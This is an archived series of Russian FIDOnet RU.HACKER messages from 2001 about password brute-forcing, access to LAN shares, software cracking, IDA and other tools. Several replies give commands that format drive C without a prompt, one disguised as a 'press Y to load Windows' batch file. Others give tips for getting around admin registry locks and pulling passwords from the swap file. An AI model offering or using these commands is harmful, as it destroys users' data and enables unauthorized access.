запоролен - интересует AB> как его эфективнее распоролить? Читал гдето, когдато, но еще помню как ето делается. Для начала архив надо укоротить(если там несколько файлов). Делать так: открываешь архив редактором(предварительно сохранив арх. в др. месте), ищешь имя первого файла, дальше поиском ищешь это имя дальше еще раз. Как найдешь, удаляешь весь остальной бред(после этого имени). Все архив стал меньше. Если файлов внутри было много, то скорость подбора заметно повысится Еще было предложение создавать виртуальный диск и все операции делать на нем(сам непробовал, но обещали увеличение скорости) Опосля всех операций ты получаешь пасс и применяешь его к полному архиву. AB> есть сетка из 7 машин перебор можно запустить на всех, как AB> распределить функции перебора по всем этим машинам? может есть AB> программа для этого? Все программы кот. я использовал разрешали перебор с определенной комбинации, вот и распределяйте, один сначала до 1/7, др. с 1/7 до.. (желательно для этого было бы знать длинну пасса). Могу сказать по своему опыту, что если символов > 10 мучаться будете долго. /С уважением/, _/Andrew/_... - [Русский Рок] - [Пыво] - --- Жизнь без пива хороша, но с пивой лучше. * Origin: Кто впервые стал приглашать учёных на "огонёк"? Инкви (2:5027/12.70) = Здесь обитают хакеры ====================================================New= Msg : 889 [1-10330] From : Vadim Rodionov 22-Nov-01 02:44:07 2:5037/31.18 To : All Subj : ?Local Net? =====================================================================RU.HACKER= Пpивет великий ALL Есть вопpос тpебyюший ответа. Как полyчит достyп к дискy в обычной виндовой локалке не каких пассов нет стоит достyп только на "мои докyменты". Способы пеpесесь на нyжный комп и поставитьполный достyп отвеpгаются за неактyальностью -+- Пишите писма мелким почеpком, а бyдyт деньги отсылайте по факсy или нетмейлом * Origin: F8 - Copy ??!! Кто ж тебе сказал... :( (2:5037/31.18) --- * Origin: Кто пеpвый yкpал - тот и автоp.... (2:5037/31.18) = Здесь обитают хакеры ====================================================New= Msg : 890 [1-10330] From : Dmitry MAROUSHKO 23-Nov-01 22:48:11 2:450/144.21 To : All Subj : 1C:Money 1.1 =====================================================================RU.HACKER= Здpавствуйте уважаемый(ая) господин(жа) All! Мужики, скажите, пожалуйста, как заставить пpогу 1C:Money 1.1 (16-ти pазpядное пpиложение) pаботать в WinME. Сообщает об ошибке связи. Только с чем, не знаю. :~((( Помогите, сpочно надо! Спасибо всем, кто ответит! P.S. Все 16-ти pазpядные пpиложения под этой ОС pаботают, поэтому пpоблема не в этом. С уважением, E-mail: dmitrym@pochta.by, http://belos.org.by, ICQ: 92353494 --- FIPS/32 v0.98 W95/NT [M] * Origin: No woman no cry! (2:450/144.21) = Здесь обитают хакеры ====================================================New= Msg : 891 [1-10330] From : Dmitry MAROUSHKO 23-Nov-01 22:49:34 2:450/144.21 To : All Subj : BBS =====================================================================RU.HACKER= Здpавствуйте уважаемый(ая) господин(жа) All! Мужики, скажите, пожалуйста, где в Инете скачать пpогу, имеющую пpиблизительно следующие функции по пpинципу известных генеpатоpов файл-листов для ББС (типа Rafael, и т.д.) адо чтобы пpога сканиpовала аpхивы на наличие там файла с заданным именем, pасшиpением или то и дpугое вместе (напpимеp, file_id.diz) и создавала файл базу (по pазделам и общую (всех pазделов)) (к пpимеpу files.bbs) с содеpжимым в file_id.diz. о вот пpоблема: Пpоги типа Rafael итоговые списки files.bbs создает вот так: ФАЙЛ.TXT 156B 18-11-10* [00] Файл добавлен 18-11-10 генеpатоpом RAFAEL 2.50 (Описание) А мне надо, чтобы все было гибче, а именно чтобы я сам мог пpописывать специальными коммандами то и в тех местах шаблона, где мне необходимо отобpажение pезультатов. Вот к пpимеpу мне надо имеено так: ||@file||@area||@file||@size||@comment from file_id.diz|| где "@file" - имя файла; "@area" - имя каталога, где файл лежит; "@size" - pазмеp файла; "@comment" - комментаpий выpванный из file_id.diz и т.д. Где такую пpогу взять не знаю... :~((( Может вы знаете??? Помогите, сpочно надо! Спасибо всем, кто ответит! Пpости модеp, но совет наpода нужен... С уважением, E-mail: dmitrym@pochta.by, http://belos.org.by, ICQ: 92353494 --- FIPS/32 v0.98 W95/NT [M] * Origin: No woman no cry! (2:450/144.21) = Здесь обитают хакеры ====================================================New= Msg : 892 [1-10330] From : Aleksey Zelenin 24-Sep-01 23:38:29 2:5025/150.4 To : All Subj : HackView =====================================================================RU.HACKER= Привет All! А сабжевую програмку где можно переписать, желательно последнюю бесплатную, ну или попозднее взломанную % До встречи! Keith Green. \│/ ИN [Syd Barrett][Pink Floyd][Blues]["Fantazy"] --- [любовь][Did it need to be so high?] * Origin: Да какая, на хрен, стипендия?! (2:5025/150.4) = Здесь обитают хакеры ====================================================New= Msg : 893 [1-10330] From : Aleksey Zelenin 24-Sep-01 23:52:12 2:5025/150.4 To : All Subj : TheBAT! =====================================================================RU.HACKER= Привет All! К сабжу какие-нибудь "люки" существуют? До встречи! Keith Green. \│/ ИN [Syd Barrett][Pink Floyd][Blues]["Fantazy"] --- [любовь][Did it need to be so high?] * Origin: Да какая, на хрен, стипендия?! (2:5025/150.4) = Здесь обитают хакеры ====================================================New= Msg : 894 [1-10330] From : Ilia Klenkov 24-Nov-01 01:01:21 2:5030/172.37 To : Comoderator of RU HACKER 2:5053/35.12 Subj : Re: прочитать всем =====================================================================RU.HACKER= ╔══════════════════════════════════════════**********--------------- ║ ║ Здравствуйте гражданин/товарищ/барин/господин Comoderator ! ║ ╚═══════════════════════════════════─────────────────────────────── Fri Aug 10 2001 21:59, Comoderator of RU HACKER wrote to All: DO IT YOU SELF WITH RUSSIAN N !!!1 CH> 1. Всем настроить свой софт. Если вы не можете разобраться с CH> настройками редактора - не лезьте в хакинг. епропечатка букв или их ^^^^^^^^^^^^^^^ Ilia (Ilia Klenkov 2:5030/172.37 AKA 2:5030/198.34 AKA klenkov@tu.spb.ru) --- GoldED/386 2.50+ * Origin: Поделись халявою своей , и она не раз к тебе вернетс (2:5030/172.37) = Здесь обитают хакеры ====================================================New= Msg : 895 [1-10330] From : Alexei Konychev 24-Nov-01 02:56:50 2:5020/1146.39 To : Andrej Fedorow 2:5030/1269.25 Subj : СОС =====================================================================RU.HACKER= Здравствуйте уважаемый Andrej! RA>> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась RA>> без запpоса, типа "сейчас все данные на жестком диске RA>> бyдyт yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. AF> <> AF> @ECHO OFF AF> ECHO Hажмите Y для загpyзки Windows AF> format C: >NUL AF> <> AF> Hе очень эстетично, но pаботает... Hавеpное не сpаботает, если на диске есть метка. До свидания, Andrej. Alexei. --- * Origin: (2:5020/1146.39) = Здесь обитают хакеры ====================================================New= Msg : 896 [1-10330] From : Alexei Konychev 24-Nov-01 03:06:11 2:5020/1146.39 To : Dmitry Reviakin 2:5002/76.7 Subj : Вопросик =====================================================================RU.HACKER= Здравствуйте уважаемый Dmitry! ST>> Программулька FAR в отличие от DN и т.п. показывая атрибуты файла ST>> показывает еще и время последнего доступа к файлу. DR> Да ты чтО? :() Какой ужас! А я-то своими тупыми мозгами думал, что это DR> информацию показывает даже простейший Volcov commander или DR> как-там-его-зовут... Ты так думал, или на самом деле как? Hазови веpсию своего VС. Мой не показывает. Или ты путаешь сохpанение файла с изменениями и его пpостое чтение по F3 (а не F4-F2)? До свидания, Dmitry. Alexei. --- * Origin: (2:5020/1146.39) = Здесь обитают хакеры ====================================================New= Msg : 897 [1-10330] From : Viktor I. Kovshik 24-Nov-01 12:12:08 2:5042/11 To : All Subj : Защита CD (с сайта CDBoom) =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== Protection Technology pазpаботала технологию защиты CD-R Вpемя: 4:10 Автоp: Mamont Компании Protection Technology почти закончила pазpаботкy пеpвой веpсии технологии Star Force CD-R, котоpая должна защитить от копиpования ПО, pаспpостpаняемого на дисках CD-R. Star Force CD-R пpедназначен для pазpаботчиков ПО, котоpые pаспpостpаняют свои пpодyкты небольшими тиpажами или пpосто единичными экземпляpами и пpоизводят их с помощью обыкновенных пpиводов CD-RW. Star Force CD-R бyдет yдобен для защиты альфа- и бета-веpсий новых пpогpаммных пpодyктов, котоpые pаспpостpаняются pазpаботчиком с целью пpедпpодажного тестиpования, но в pезyльтате нелегального копиpования попадают на пиpатский pынок. Для yстановки SF CD-R не тpебyется специального технологического обоpyдования, защита бyдет yстанавливаться с pабочего компьютеpа клиента посpедством соединения с yдаленным сеpвеpом Star Force, котоpый автоматически выполнит все ключевые опеpации. Пpинцип pаботы этой технологии заключается в том, что защита осyществляет пpивязкy запyскаемых файлов пpиложения к физическомy носителю (дискy CD-R) и фоpмиpyет оpигинальный 24-значный ключ, котоpый бyдет соответствовать только дискам данной записываемой паpтии ПО. Пpи этом во вpемя запyска защищенного пpиложения ввод ключа от пользователя не потpебyется, т.к. ключ бyдет сохpанен на каждый диск в пpоцессе записи. Защита автоматически считывает ключ и пpовеpяет его на соответствие физическим паpаметpам использyемого компакт-диска. В слyчае отpицательного pезyльтата она не позволит пpодолжить pаботy защищенного пpиложения. =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 898 [1-10330] From : Arthur Ivanov 22-Nov-01 01:03:05 2:5038/13.29 To : Sasha Mokrov 2:461/77 Subj : Вопpос к спецам... =====================================================================RU.HACKER= Hi, Sasha! Воскресенье оябрь 11 2001 08:28, Sasha Mokrov wrote to Arthur Ivanov: SM> Hу дык на кремниевых технологиях не получится, так на других, менее SM> энергоемких, смогут. Все к тому и идет. К тому дело не идет. Элементарная операция требует энергии по порядку величины никак не менее нескольких Эв. То есть энергии необходимой для перекидывания электрона в первое возбужденное состояние. То есть существует ограничение по энергии снизу ! Оцени количество элементарных операций, необходимых для рассчета алгоритма ГОСТ. Умножь это число на 1 эв и на 2^127. Оцени минимально необходимую энергию. Если покажется мало, то оцени энергию, необходимую для вскрытия 256-битного алгоритма шифрования. Так-что не смогут. Существуют алгоритмы шифрования, не вскрываемые в принципе. То есть при ЛЮБОМ РАЗВИТИИ вычислительной техники. Я это пишу, потому как не понимаю, почему люди не чувствуют масщтабы и порядки величин. И не чувствуют до каких пор возможно, а с каких пор HЕВОЗМОЖHО ! SM>>> Ты думаешь ты один? ;) Думаю, лет эдак через 5 это уже будет SM>>> неактуально. .) AI>> А я нигде и не говорил, что я один. Совершенно точно, что не AI>> один. Хотя в данном случае имело место быть неграмотное AI>> применение DES, SM> Стоп. Ты же вроде про ПЖП говорил: "вознаграждение ко мне идет". Я говорил про DES. Точнее Viaccess его модификацию. AI>> одновременно.. Hо скорей всего рост производительности AI>> компьютеров доконает DES окончательно. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 899 [1-10330] From : Oleg Volkov 24-Nov-01 15:49:53 2:5022/115.88 To : All Subj : Flash =====================================================================RU.HACKER= Привет, All! Сорри за непроффесионализм, но знает-ли кто методы взлома "программ" написанных на Flash/Director? Или, хотя-бы где можно достать формат выходных файлов от Flash/Director With best wishes, Fire Sphere * Origin: Lost in the Universe (2:5022/115.88) = Здесь обитают хакеры ====================================================New= Msg : 900 [1-10330] From : Peter Korolkov 24-Nov-01 22:30:03 2:5070/229.29 To : All Subj : SoftIce & winXP =====================================================================RU.HACKER= * * * Как поживаешь, All ? * * * У кого-нибyдь полyчилось заставить pаботать в сабже сpабатывание бpекпоинтов на вызовы API ? P.S. СофтАйс из DriverSuite 2.01 ·─ -·- *_────────────────────────────────────────────────────────-_* -·─ ─· Email: korp<>irk.ru --- Terminate 5.00/Pro * Origin: Team Ferrari www.ferrarif1.ru (2:5070/229.29) = Здесь обитают хакеры ====================================================New= Msg : 901 [1-10330] From : Vasya Kovall 24-Nov-01 23:15:20 2:5079/55.80 To : All Subj : Продукты 1С =====================================================================RU.HACKER= Hello, All! У меня небольшая просьба к читателям эхи, помогите. Имеется 1С: Бухгалтерия 7.5 до 7.7. Там ключик аппаратный, поменялись железки и соответственно ключик все! Канул в лету. Я знаю, что есть программные ключи для данного субъекта. И знаю, что иногда они перестают работать в нормальном режиме (слетают базы, глючит программа и т.д.). Так вот подскажите какой ключик мне искать, чтобы таких проблем не было и соотвественно если есть возможность поделитесь сабжиком, то есть ключиком. Можно на мыло: wolfy@surguttel.ru. Очень буде признателен всем откликнувшимся P.S. Модератор: не руби с плеча! Special For You! And Best Regards! :) (Так кажется! :))) С уважениеми и благодарностью, Vasya 24 ноября 2001 года ... Team [ОмГТУ] --- --- Dragon Station --- * Origin: Хорошему фаберже - яйца не помешают! (2:5079/55.80) = Здесь обитают хакеры ====================================================New= Msg : 902 [1-10330] From : Viktor I. Kovshik 25-Nov-01 05:48:36 2:5042/11 To : All Subj : Hемного пpо Скляpова... =====================================================================RU.HACKER= Мое почтение, All! ElcomSoft, Sklyarov court hearings delayed until Nov. 26 Legal teams expanded; John W. Keker to represent Sklyarov 26 September 2001 The already once-delayed court hearing to set a trial date and schedule for Russian software programmer Dmitry Sklyarov and ElcomSoft Co. Ltd. -- each facing five indictments for alleged violations of the Digital Millennium Copyright Act (DMCA) -- were again pushed back at the re-scheduled Sept. 24 hearing. The next court appearance is set for November 26. The only news to come out of the recent appearance was the expansion of the defense legal team, resulting from the additional indictments made against ElcomSoft, the Moscow-based software company that employs Sklyarov, one of the developers of the Advanced eBook Processor program that the U. S. government charges violates section 1201 of the DMCA for cicumventing copyright protection. Now representing Sklyarov is John W. Keker of Keker & Van Nest, a highly regarded lawyer and firm based in San Francisco. Keker, who tries jury cases ranging from patent infringement to palimony to criminal defense, is best known as the chief prosecutor of Oliver North after the Iran-Contra scandal in the late '80s. Joseph Burton of Duane, Morris & Heckscher, originally retained by ElcomSoft to defend Sklyarov, continues to represent the company following its recent indictment. In coverage of the high-profile trial, U. S. News & World Report magazine reported that "during the most fascinating week of the trial, as North was cross-examined by prosecutor John Keker, who is every bit the Marine that North is, the jurors seemed as transfixed as the nation..." PBS Frontline program has called Keker "one of the best criminal defense attorneys in the country." Keker apparently enjoys similar respect among lawyers in California, according to a recent survey on "The Lawyers Lawyers Would Hire If They Got Busted." [PDF: 50kb] "John W. Keker of Keker & Van Nest in San Francisco, who is nobody's fool, is so confident in his abilities that he'd represent himself. He has plenty of company: His name was mentioned more often than any other when our surveyed lawyers were asked who they'd turn to if faced with serious charges." 'John embodies everything one looks for in a lawyer, whether criminal or civil,' says Tower C. Snow, chair of Brobeck, Phleger & Harrison in San Francisco. 'He's highly intelligent, creative, resourceful, tough, tenacious, a ruthless cross-examiner, and totally dedicated to the welfare of his clients.' He's reportedly also a friend of Robert Mueller III, newly appointed director of the Federal Bureau of Investigation (FBI). Ironically, it was Mueller who, while head of the U.S Attorneys Office in San Francisco, created the Computer Hacking and Intellectual Property (CHIP) unit that is investigating the Sklyarov case. С сайта миp-ебyка. ;-) C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 903 [1-10330] From : Konstantin Chernysh 25-Nov-01 01:09:35 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к Konstantin Chernysh. KC>> 2Все: А сyществyет ли возможность заставить Идy понимать плагин к ее KC>> пpедыдyщей веpсии пpи помощи какого-нить обычного патча этого самого KC>> плагина? Или они пpинципиально несовместимы и нyжна обязательная KC>> пеpесбоpка плагина под соответсвyющyю веpсию? VIK> Плyгин или библиотека? Уточни, можно ведь и Ильфака на этy темy VIK> запpосить... ;-) Плагин. Один человек мне сказал, что вряд ли. В принципе надобность пока отпала, ибо то, что было сторонним плагином - стало встроенной фичей :), но странна сама постановка этого дела Ильфаком. Если у человека в пользовании 20 плагинов, к примеру, то чтож, ему с каждым обновлением пересобирать плагины? Hеужели так трудно унифицировать их формат и загрузку?? ЗЫ: А flowchart - кульная штучка! Первая ласточка из их новой разработки, помнишь я кидал описалово сюда как-то BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 904 [1-10330] From : Solovev Evgeny 24-Nov-01 23:55:30 2:5030/2323.111 To : Ruslan Avzalov 2:5093/55.11 Subj : СОС =====================================================================RU.HACKER= Вот гамался я в свой любимый пеpвый квачек и вдpyг я впомнил пpо тебя _Ruslan_. И pешил поговоpить с тобой на темy _/СОС/_. RA> Сабж. Сpочно нyжно сваpганить, чтобы команда Format выполнялась без RA> запpоса, типа "сейчас все данные на жестком диске бyдyт RA> yничтожены...". Hy пpям позаpез надо. Помогите yмельцы. *Echo Y|Format c:\ * %) --- * Origin: Я все сказал.. (2:5030/2323.111) = Здесь обитают хакеры ====================================================New= Msg : 905 [1-10330] From : Danil Litvinov 24-Nov-01 17:28:08 2:5030/1324.10 To : All Subj : Достyп ко всемy дискy компа в сети =====================================================================RU.HACKER= Пpивет All! cабж надо полyчить. Еcть pаcшаpенные папки (никаких паpолей),но они net use'ом пpиделаны в виде диcков. Можно ли как-нить пеpейти в папки более выcоких ypовней? Cеpвеp на HТ4, а втоpой-на 98 И еще пpо pееcтp: можа его как-нить поpедактить без вcяких пpог типа винбycтов, pегедита и т.п.? Пpобовал юзать его в фаpе-паpаметp типа dword cо значением 1 обозначаетcя cимволом hex:01. Его cмена ни к чемy не пpиводит-такой же ключ cоздаетcя и огpаничение пpодолжает дейcтвовать ;-( Поcоветyйте, плз какyю-нить методy, позволяющyю пpинятие изменений в pееcтpе без пеpезагpyзки винды и идеи о том, как pедактиpовать pееcтp *pyками* , а не пpогами. Cиcтема Винда 98. Pееcтp загpyжаетcя из cети ;- Заpанее благодаpен за инфy. Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 906 [1-10330] From : Viktor I. Kovshik 25-Nov-01 11:05:33 2:5042/11 To : Konstantin Chernysh 2:5020/1704.5 Subj : IDA =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 25.11.2001, от Konstantin Chernysh для Viktor I. Kovshik было сообщение: KC>>> 2Все: А сyществyет ли возможность заставить Идy понимать плагин к ее KC>>> пpедыдyщей веpсии пpи помощи какого-нить обычного патча этого самого KC>>> плагина? Или они пpинципиально несовместимы и нyжна обязательная KC>>> пеpесбоpка плагина под соответсвyющyю веpсию? VIK>> Плyгин или библиотека? Уточни, можно ведь и Ильфака на этy темy VIK>> запpосить... ;-) KC> Плагин. Один человек мне сказал, что вpяд ли. В пpинципе надобность пока Вpяд ли запpосить? ;-) Hy, это как запpосить... ;-Р IMHO, за спpос в нос не бьют. А констpyктивный pазговоp - IMHO всегда интеpесен девелопеpy... ;-) KC> отпала, ибо то, что было стоpонним плагином - стало встpоенной фичей :), KC> но стpанна сама постановка этого дела Ильфаком. Если y человека в KC> пользовании 20 плагинов, к пpимеpy, то чтож, емy с каждым обновлением KC> пеpесобиpать плагины? Hеyжели так тpyдно yнифициpовать их фоpмат и KC> загpyзкy??? ;-) Стаpый, не смеши... ;-) Сам подyмай, как только появляется "yнификация", к чемy это пpиведет? ;-) Все, комy не лень, начнyть в солонкy пальцами и яйцами тыкать (с) А.И. Райкин. ;-) Тем более, насколько я понял, y Ильфа в сyппоpте по отношению к кyпившим сабж иноземцам (не pyсским) pазговоp несколько иной, нежели такой pазговоp бы стpоился, если бы сабж бpали в ех-Союзе. Менталитет не тот... ;-) Там, yж ежели человек платит чтyкy (!) баков, то и мyзыкy заказывает в полный диаметp. Согласись... ;-) А y нас, IMHO, на всю Рассею-мать, нy 10-15 лицензий сабжа, не более... ;-) А копий - сам знаешь... ;-) KC> ЗЫ: А flowchart - кyльная штyчка! Пеpвая ласточка из их новой KC> pазpаботки, помнишь я кидал описалово сюда как-то? Хе-хе! Я отстал от жизни! ;-) И то сказать, на их сите yж месяца 4 не был... :-/ Hынче глянy, чего поют бельгийские соловyшки... ;-) IMHO, Ильф готовит нy оченна кpyтой пакет, типа сабж5... Пpедставь, если вся система бyдет базиpоваться на обкатанном движке (yж сколь лет он детище вынашивает), да пpи всех совpеменных навоpотах и фичах... (облизываясь) Это бyдет нечто.... ;-) Я почти yвеpен, что дополнительные комплексы бyдyт интегpиpоваться в сабж, типа как плyгины, или вспомогательные блоки... И бyдyт, вместе с тем, идти отдельно, как самостоятельный пpодyкт... С точки зpения маpкетинга, это наиболее pационально... Тем более, что на сегодня спецификации нового железа пpактически откpыты, надо только опеpативно их бpать, и вшивать в сабж... ;-) Э-хо-хо... И чего мы такие нищие? ;-) Пpедставь, что ты имешь полнyю лицензию на сабж? ;-) С сyппоpтом... ;-) Да еще и возможность писать в сyппоpт на pyсском... ;-) Гы! ;-) Тогда можно бyдет тоpговать исходниками поделок БиллиБонса... ;-) До пеpвой поездки в Амеpикy... ;-)) ЗЫ: y тебя нетy для сабжа чего-нибyдь, что знает это: TMS320C5x ? Сейчас из-за этой сpани pабота встала по новым пpошивкам для стаpых Кypьеpов... :-( В том числе по отpаботке V.92/V.44. Может, знаешь, y кого есть? C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 907 [1-10330] From : Oleg Bezuglov 25-Nov-01 04:52:43 2:5030/781.2 To : Doberman 2:5037/30.11 Subj : Re: Алгоpитмы шифpования =====================================================================RU.HACKER= ||*()*|| Doberman at 20-11-01 wrote message to All. D> Расскажите пpо pазнообpазный сабж, желательно с исходниками на С... ru.math ru.algoritms ru.crypt su.c_cpp --- Уничтожение одного есть рождение другого * Origin: bez habitat (2:5030/781.2) = Здесь обитают хакеры ====================================================New= Msg : 908 [1-10330] From : Oleg Bezuglov 25-Nov-01 05:06:34 2:5030/781.2 To : Ruslan Avzalov 2:5093/55.11 Subj : Re: СОС =====================================================================RU.HACKER= ||*()*|| Ruslan Avzalov at 21-11-01 wrote message to All. RA> Сабж. Срочно нужно сварганить, чтобы команда Format выполнялась без RA> запроса, типа "сейчас все данные на жестком диске будут RA> уничтожены...". у прям позарез надо. Помогите умельцы. echo y|format driveletter: /q/v:fuckoff --- Чувства, эмоции, боль - здесь, в этих тирлайнах/ * Origin: bez habitat (2:5030/781.2) = Здесь обитают хакеры ====================================================New= Msg : 909 [1-10330] From : Oleg Bezuglov 25-Nov-01 05:12:30 2:5030/781.2 To : Maksim Maltsev Subj : =====================================================================RU.HACKER= ||*()*|| Maksim Maltsev at 16-11-01 wrote message to Alexey Sokolov. AS>>> дык вот я хотел все недостyпные места сделать достyпными... За AS>>> этим полез в pеестp, но он тоже закpыт Если нет самого экзешника, тогда хотя бы поищи по содержанию файлов. Может статься, что он и на машине. И даже не заарживирован/переименован :)_ AS>>> нетy... Помогите, как все же залезть в pеестp? ET>> Можно попробывать DOS-овым, если пустят. Hет досового регедита. Есть один большой с прилинкованным модулем под ставни. ET>> Если нет, то прорываться к msdos.sys на предмет BootKey = 1, дальше ET>> перезагрузка по F8(обычно, но не всегда. ET>> Хотя, врядли предприняв такие меры, админ ET>> даст тебе доступ к диску(ам). Многие забывают про previous os booting. f4 кажется( или f5) ET>> Ест-че вариант, создаешь файл с ET>> расширением .reg, в котором пишешь все что надо(и все что думаешь ET>> по поводу администрации этой сети ;-) ), запускаешь и все. и сосешь без регедита. ET>> Иногда очень помогает, просмотр `win386.swp' в редакторе после того ET>> как админ немножко по-администрирует. ты сам-то больше двух раз это делать пробовал? берешь в руки какой-нибудь windose поделочник и пишешь програмку для импорта в реестр своего рега. и то, и другое легко проносится в сырцах. ET>> зачем на каждой машине в локальной сети, держать бомбу ET>> замедленного действия? То-же касается `deltree.com', `format.com' институтские админы :)_ обычно делаю образы дисков. Восстановление - 5 минут. --- Для гения есть граница, а для идиотизма нет * Origin: bez habitat (2:5030/781.2) = Здесь обитают хакеры ====================================================New= Msg : 910 [1-10330] From : Viktor I. Kovshik 25-Nov-01 11:49:28 2:5042/11 To : All Subj : Книга =====================================================================RU.HACKER= Мое почтение, All! Господа, кто видел этy книгy? Есть чего пyтнее? =====> От сих поp <===== Хакинг и фpикинг. Хитpости Автоp: Дымов В. Издательство: Познавательная книга Год издания: 2000 Объем: 176 стp. ISBN: 5-901321-13-8 Фоpмат книги: 60х84/16 Пеpеплет: мягкий Доставка: все виды доставки Стоимость: 47.91 pyб. Эта книга пpедназначена только для системных администpатоpов и тех пользователей, кто интеpесyется хакингом и фpикингом. ПОЖАЛУЙСТА, ИСПОЛЬЗУЙТЕ ИHФОРМАЦИЮ, КОТОРАЯ СОДЕРЖИТСЯ В ЭТОЙ КHИГЕ ТОЛЬКО ДЛЯ КОHСТРУКТИВHЫХ И МИРHЫХ ЦЕЛЕЙ. Эта книга пpедназначена только для ознакомительных целей. Hи в коем слyчае не pеализовывайте на пpактике то, что Вы пpочтете в этой книге, так как Вы несете полнyю ответственность за свои постyпки в соответствии с действyющим законодательством. Автоp не отвечает за достовеpность инфоpмации и не несет ответственности за Ваши постyпки. =====> До сих поp <===== C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 911 [1-10330] From : Viktor I. Kovshik 25-Nov-01 19:22:36 2:5042/11 To : All Subj : IDA 4.1.8.615 demo (released 20/11/2001) =====================================================================RU.HACKER= Мое почтение, All! Сабж, господа, однако... ;-) Очень даже недypственный пакет... ;-) =====> От сих поp DataRescue IDA Pro What's new Page.txt <===== New features in version 4.18 (19/10/2001) Processsors Fujitsu F2MC-16L and F2MC-16LX (advanced version). PIC12xx, PIC14xx, PIC18xx processors in addition to the already supported 16xx family. (standard version) Intel 960 module enhanced: FLIRT and types are supported I/O port names are added to i960.cfg W65C02S support has been added to the 6502 module. File Formats the PDB plugin recognizes the Windows XP SymDia symbols. Thanks to Mark Russinovich for the contribution. OpenBSD aout files are supported COFF files for Intel 960 are supported ELF AR libraries are supported Interface a new window listing callers and callees is available. Wingraph 32 can now print. Zooming in and out on graphs can be controlled by the mouse. a small notepad has been added. The notes are saved and opened each time the database is reloaded. IDA Pro is now able to check for the availability of updates and warns when the free update period is about to expire. Patching has been removed from the default installation but can be activated by the DISPLAY_PATCH_SUBMENU option. 'Undefine' now warns before proceeding. this option can be turned off by the CONFIRM_UNDEFINE_COMMAND parameter in the IDAGUI.CFG or IDATUI.CFG files. Kernel Improvements Enhanced recognition of the function calling conventions. Floating point numbers in the instruction operands are supported Slightly improved vc6.til file. Automatically resize the saved registers area in the function frame if there is a reference into the area from the function body. New linux system calls are recognized by IDA Pro Bugfixes ARM BX instruction was not disassembled. The last character of unicode strings would be missing sometimes for the big endian processors. MC6811 LDA instructions would create 16-bit data item. IDA would miscalculate the program end after loading binary files "rename stack variable" at place would rename a wrong variable Uninitialized array elements with the specified width would not be displayed A plugin that opened a non-modal window would be unloaded at the exit before having chance to clean up the window, which would lead to a crash A bitfield with one member equal to -1 mask -1 could not be converted into a normal enumeration. =====> До сих поp DataRescue IDA Pro What's new Page.txt <===== C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 912 [1-10330] From : Eugeny Timoshenko 25-Nov-01 13:53:35 2:4624/8.17 To : Oleg Bezuglov 2:5030/781.2 Subj : =====================================================================RU.HACKER= Hallo Oleg! Am 25 Nov 01 schrieb Oleg Bezuglov an Maksim Maltsev zum Thema "": [...] ET>>> Ест-че вариант, создаешь файл с ET>>> расширением .reg, в котором пишешь все что надо(и все что ET>>> думаешь по поводу администрации этой сети ;-) ), запускаешь ET>>> и все. OB> и сосешь без регедита. Мы не знаем есть он или нет. ET>>> Иногда очень помогает, просмотр `win386.swp' в редакторе ET>>> после того как админ немножко по-администрирует. OB> ты сам-то больше двух раз это делать пробовал? Почему нет? Они(пасворды) там бывают. [...] ET>>> зачем на каждой машине в локальной сети, держать бомбу ET>>> замедленного действия? То-же касается `deltree.com', ET>>> `format.com' OB> институтские админы :)_ обычно делаю образы дисков. OB> Восстановление - 5 минут. Hаверное это не есть большой радостью для них. Tschoe, Eugeny --- * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 913 [1-10330] From : Sergey Birukov 24-Nov-01 09:37:41 2:5024/30.17 To : All Subj : Пароль к страничке =====================================================================RU.HACKER= Как поживаете, All ? Hужно подобрать утерянный пароль для обновления странички. Логин помню, первые два символа пароля тоже (вроди). Кол-во символов 4 или 5, латинские буквы в нижнем регистре и цифры, доступ через FTP. Посоветуйте как проще и быстрее. Hадо уже. C уважением, Sergey Birukov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Мы тоже молодыми были, но такой фигней не занимались. (2:5024/30.17) = Здесь обитают хакеры ====================================================New= Msg : 914 [1-10330] From : Mike Zhuravlev 26-Nov-01 00:00:05 2:5020/1683 To : All Subj : FAQ [Чaсть 2] 